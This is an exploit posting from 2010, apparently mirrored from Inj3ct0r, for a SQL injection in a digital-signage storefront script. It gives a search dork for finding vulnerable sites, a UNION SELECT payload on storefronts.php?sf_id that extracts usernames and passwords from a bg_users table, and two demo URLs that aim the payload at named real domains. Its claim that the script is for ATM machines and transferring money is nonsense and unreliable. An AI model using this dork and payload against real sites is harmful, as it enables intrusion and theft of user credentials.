Home / os / win7

NetWorld Alliance SQL Injection Vulnerability

Posted on 27 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>NetWorld Alliance SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================
NetWorld Alliance SQL Injection Vulnerability
=============================================


# Exploit Title:   NetWorld Alliance SQL InJection
# Date: 27/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.vbspiders.com
# Script url: http://www.networldalliance.com/2010-digital-signage-future-trends-report
# Price: US$797.00
# Version: N/A
# Tested on: Windows
# CVE : ()
 
:::::::::::::::::::::::::
 
 
=================Exploit=================
Descript: This Script Is For ATM Machine And How To use it and give and
get and transfer money from it
it is private script

---DorK:(&quot;? 2010 NetWorld Alliance&quot;)---

You will get a lot of sites  enter any site
and then Put this (storefronts.php?sf_id=any number)
after id put any number and start inject
 


----exploit----   

{{exploit}}
http://www.xxxxxx.com/storefronts.php?sf_id=(39)  --SQLI--
after the number put this
(+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--)

DeMo1
https://www.kioskmarketplace.com/storefronts.php?sf_id=-39+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--

DeMo2
http://www.digitalsignagetoday.com/storefronts.php?sf_id=-243+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
---------greatz----------
Greatz to all my frinds and the all muslims
and Golden Ice and mr.ip
and the all who know me
And VBspiders 


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :